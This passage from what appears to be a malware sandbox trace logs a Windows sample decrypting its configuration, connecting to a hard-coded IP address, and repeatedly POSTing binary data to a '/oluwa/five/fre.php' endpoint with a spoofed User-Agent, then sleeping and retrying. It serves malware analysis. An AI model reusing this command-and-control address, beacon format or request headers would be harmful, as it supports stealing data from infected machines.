pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0171.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.601] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0171.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.602] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0171.602] GetProcessHeap () returned 0x6a0000 [0171.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.603] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0171.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.605] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0171.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.606] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0171.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.607] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0171.607] GetProcessHeap () returned 0x6a0000 [0171.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0171.607] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf530*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0171.607] GetProcessHeap () returned 0x6a0000 [0171.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0171.607] socket (af=2, type=1, protocol=6) returned 0x358 [0171.608] connect (s=0x358, name=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0171.639] FreeAddrInfoW (pAddrInfo=0x6bf530*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0171.639] GetProcessHeap () returned 0x6a0000 [0171.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0171.639] GetProcessHeap () returned 0x6a0000 [0171.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0171.640] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.641] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0171.641] GetProcessHeap () returned 0x6a0000 [0171.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0171.641] GetProcessHeap () returned 0x6a0000 [0171.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.642] GetProcessHeap () returned 0x6a0000 [0171.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0171.642] GetProcessHeap () returned 0x6a0000 [0171.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0171.643] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.644] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0171.644] GetProcessHeap () returned 0x6a0000 [0171.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0171.644] GetProcessHeap () returned 0x6a0000 [0171.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.645] send (s=0x358, buf=0x6bbd20*, len=242, flags=0) returned 242 [0171.646] send (s=0x358, buf=0x6bb998*, len=159, flags=0) returned 159 [0171.646] GetProcessHeap () returned 0x6a0000 [0171.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0171.646] recv (in: s=0x358, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0171.717] GetProcessHeap () returned 0x6a0000 [0171.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0171.718] GetProcessHeap () returned 0x6a0000 [0171.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0171.718] GetProcessHeap () returned 0x6a0000 [0171.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0171.718] GetProcessHeap () returned 0x6a0000 [0171.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0171.719] closesocket (s=0x358) returned 0 [0171.720] GetProcessHeap () returned 0x6a0000 [0171.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0171.720] GetProcessHeap () returned 0x6a0000 [0171.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.720] GetProcessHeap () returned 0x6a0000 [0171.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0171.721] GetProcessHeap () returned 0x6a0000 [0171.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0171.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12fc) returned 0x358 [0171.724] Sleep (dwMilliseconds=0xea60) [0171.725] GetProcessHeap () returned 0x6a0000 [0171.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0171.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0171.743] GetProcessHeap () returned 0x6a0000 [0171.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9d88 [0171.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.745] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b9d88, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0171.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.747] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.748] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.748] GetProcessHeap () returned 0x6a0000 [0171.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9d88 | out: hHeap=0x6a0000) returned 1 [0171.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.750] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0171.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.757] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0171.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.759] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0171.759] GetProcessHeap () returned 0x6a0000 [0171.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.761] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0171.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.762] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0171.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.764] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0171.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.765] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0171.765] GetProcessHeap () returned 0x6a0000 [0171.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0171.765] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0171.766] GetProcessHeap () returned 0x6a0000 [0171.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0171.766] GetProcessHeap () returned 0x6a0000 [0171.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.767] GetProcessHeap () returned 0x6a0000 [0171.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0171.767] GetProcessHeap () returned 0x6a0000 [0171.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0171.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.769] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0171.789] GetProcessHeap () returned 0x6a0000 [0171.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0171.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.790] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0171.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.792] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.793] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.793] GetProcessHeap () returned 0x6a0000 [0171.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0171.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.795] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0171.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.796] CryptDestroyKey (hKey=0x6ad020) returned 1 [0171.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.797] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0171.797] GetProcessHeap () returned 0x6a0000 [0171.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.798] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0171.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.799] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0171.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.800] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0171.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.801] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0171.801] GetProcessHeap () returned 0x6a0000 [0171.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0171.801] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0171.801] GetProcessHeap () returned 0x6a0000 [0171.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0171.801] socket (af=2, type=1, protocol=6) returned 0x35c [0171.801] connect (s=0x35c, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0171.840] FreeAddrInfoW (pAddrInfo=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0171.840] GetProcessHeap () returned 0x6a0000 [0171.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0171.840] GetProcessHeap () returned 0x6a0000 [0171.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0171.841] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.842] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0171.842] GetProcessHeap () returned 0x6a0000 [0171.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0171.842] GetProcessHeap () returned 0x6a0000 [0171.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.842] GetProcessHeap () returned 0x6a0000 [0171.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0171.842] GetProcessHeap () returned 0x6a0000 [0171.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0171.843] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0171.844] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0171.844] GetProcessHeap () returned 0x6a0000 [0171.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0171.844] GetProcessHeap () returned 0x6a0000 [0171.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0171.844] send (s=0x35c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0171.845] send (s=0x35c, buf=0x6bb998*, len=159, flags=0) returned 159 [0171.845] GetProcessHeap () returned 0x6a0000 [0171.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0171.845] recv (in: s=0x35c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0171.954] GetProcessHeap () returned 0x6a0000 [0171.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0171.954] GetProcessHeap () returned 0x6a0000 [0171.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0171.955] GetProcessHeap () returned 0x6a0000 [0171.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0171.955] GetProcessHeap () returned 0x6a0000 [0171.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0171.955] closesocket (s=0x35c) returned 0 [0171.957] GetProcessHeap () returned 0x6a0000 [0171.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0171.957] GetProcessHeap () returned 0x6a0000 [0171.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.957] GetProcessHeap () returned 0x6a0000 [0171.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0171.958] GetProcessHeap () returned 0x6a0000 [0171.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0171.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd40) returned 0x35c [0171.961] Sleep (dwMilliseconds=0xea60) [0171.963] GetProcessHeap () returned 0x6a0000 [0171.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0171.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.964] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0171.980] GetProcessHeap () returned 0x6a0000 [0171.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9ae8 [0171.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.982] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b9ae8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0171.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.983] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.983] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.983] GetProcessHeap () returned 0x6a0000 [0171.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ae8 | out: hHeap=0x6a0000) returned 1 [0171.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.985] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0171.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.986] CryptDestroyKey (hKey=0x6ad020) returned 1 [0171.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.987] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0171.987] GetProcessHeap () returned 0x6a0000 [0171.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0171.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.988] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0171.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.992] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0171.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.993] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0171.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.994] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0171.994] GetProcessHeap () returned 0x6a0000 [0171.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0171.995] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0171.995] GetProcessHeap () returned 0x6a0000 [0171.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0171.995] GetProcessHeap () returned 0x6a0000 [0171.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0171.996] GetProcessHeap () returned 0x6a0000 [0171.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0171.996] GetProcessHeap () returned 0x6a0000 [0171.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0171.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0171.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0172.009] GetProcessHeap () returned 0x6a0000 [0172.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0172.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.010] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0172.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.011] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.012] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.012] GetProcessHeap () returned 0x6a0000 [0172.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0172.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.014] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0172.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.016] CryptDestroyKey (hKey=0x6ad020) returned 1 [0172.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.017] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0172.017] GetProcessHeap () returned 0x6a0000 [0172.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.018] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0172.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.019] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0172.020] LoadLibraryW (lpLibFileName="shlwapi") returned 